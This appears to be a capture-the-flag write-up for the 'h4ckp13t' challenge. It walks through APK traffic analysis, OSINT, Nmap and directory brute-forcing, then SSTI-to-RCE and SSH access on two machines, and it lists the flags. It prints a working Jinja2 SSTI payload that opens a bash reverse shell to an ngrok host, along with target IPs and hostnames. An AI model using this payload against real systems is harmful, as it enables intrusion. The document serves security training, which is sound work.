We have an APK that requires reverse engineering. By analyzing it, we can gather clues related to machines M1 and M2. Let's break it down by downloading our APK.
First, we perform traffic analysis using Burp Suite or any other technique. In this case, I used PcapDroid from the Play Store to monitor the network traffic of our APK (h4ckp13t.apk). During the analysis, I discovered the following:
When you open this link, you will find:
Now, using the BSSID, it's a straightforward OSINT challenge to determine the location. Lets find on wigle.net
On Doing Advance Search -> WiFi Search
CTF ANSWERS
-
PROVIDE WIFI NAME :
CRMCWiFi -
PROVIDE COUNTRY OF HIDDEN SPOT :
USA
OSINT CHALLENGE COMPLETED
Following the previous hint, there is something hidden in the reviews. We navigate to Google Maps, search for the same area, and filter the results using the newest option as per the hint.
Bingo !! Now, it's time to decode $xx,xxx,xxx,xxx into an IP address xx.xxx.xxx.xxx. Based on the previous hint, we obtained the IP address 64.227.150.103.
Now, open the About page and also inspect the page source of both websites as part of the reconnaissance process.
In the page source, we discovered another flag.
One More Flag
- Website Recon Master :
H4CKP13T{YES_patch_error_302}
Now, following the Cyber Kill Chain methodology, we begin scanning with Nmap. The scan reveals several open ports, including 80, 21, 22, and 5000.
Port 22 is not exploitable due to the latest version of SSH. Now, let's investigate port 21.
Hmm, it behaves like a honeypot, so we’ll ignore this port and move on to port 5000.
It displays a message: "Direct access not allowed." You might be surprised to learn that two web servers are running on ports at same time — this is due to Apache2 reverse proxy.
In the end, we have no choice but to focus on port 80. But when I navigate to about.flag.hint, it redirects me to the Rock You page. then i check /robots.txt
Every clue keeps redirecting me to the RockYou file. Earlier, we found a file named rockyou.txt.enc, which was decrypted using Cyndia's product, The Files Lab, with a given password. I searched on Google, found the tool, and successfully decrypted the file.
Now , I got Rock You.txt
Let's perform a directory brute-force attack using Dirb or any other tool with the given wordlist at 64.227.150.103
After some time, I discovered a login page named C2 Admin Panel at http://64.227.150.103/abygurl69
Let's explore and investigate it.
After testing different parameters, I found that it is vulnerable to SSTI (Server-Side Template Injection). Let's attempt Remote Code Execution (RCE).
Using this payload, let's gain control of Machine 1.
{% for x in ().__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{ x()._module.__builtins__['__import__']('os').popen("bash -c 'bash -i >& /dev/tcp/0.tcp.in.ngrok.io/10327 0>&1'").read() }}
{% endif %}
{% endfor %}
Before that, let's set up our reverse shell listener using port forwarding with Ngrok.
After submitting the payload, we successfully obtain a reverse shell on Machine 1. We then use cat command to read the flag.
- user-machine-1 flag :
h4ckp13t{cyunas_cyberdefentech_a2e7vta}
BINGO! Let's move on to the final challenge.
Other files on this machine are rabbit holes. However, in readme.dat, there is a message instructing us to send an email to obtain information about another machine from an admin user. Let's crack the details and send an email using either a temporary or real email. After some time, I received an auto-response email.
There is also a file named part1.pem. Based on my knowledge, PEM files are used for logging into an SSH instance without a password.
Upon opening it, I noticed that some lines are missing. As per the user hint, the other half of the file is on Machine 2. Let's retrieve it and combine both parts.
Now , On Another Files
After this Email i get :
Now that we have some information about Machine 2, let's run an Nmap scan. The scan reveals that ports 80, 22, and 8554 are open. Let's start by exploring port 80.
The webpage is vulnerable to buffer overflow. Let's proceed with reconnaissance by checking /robots.txt.
It indicates that something is running on port 8554 (which, according to Nmap, is an RTSP port). Let's check what’s happening at rtsp://54.174.231.114:8554/live
Amazing! I found the final part of the PEM file at
https://h4ckp13t.piet.co.in/lovemelocalh0ste.
Now, grant the correct permissions to the PEM file and connect via SSH using the following
ssh -i "machine2.pem" ubuntu@ec2-54-174-231-114.compute-1.amazonaws.com
- user-m2 flag :
h4ckp13t{congartulation_h4ckp13t_machine252141}
END - CTF CREDIT : @localh0ste aka Vikram Pawar
Want to write a blog?
Unfold your thoughts and let your ideas take flight in the limitless realm of cyberspace. Whether you're a seasoned writer or just starting, our platform offers you the space to share your voice, connect with a creative community and explore new perspectives. Join us and make your mark!
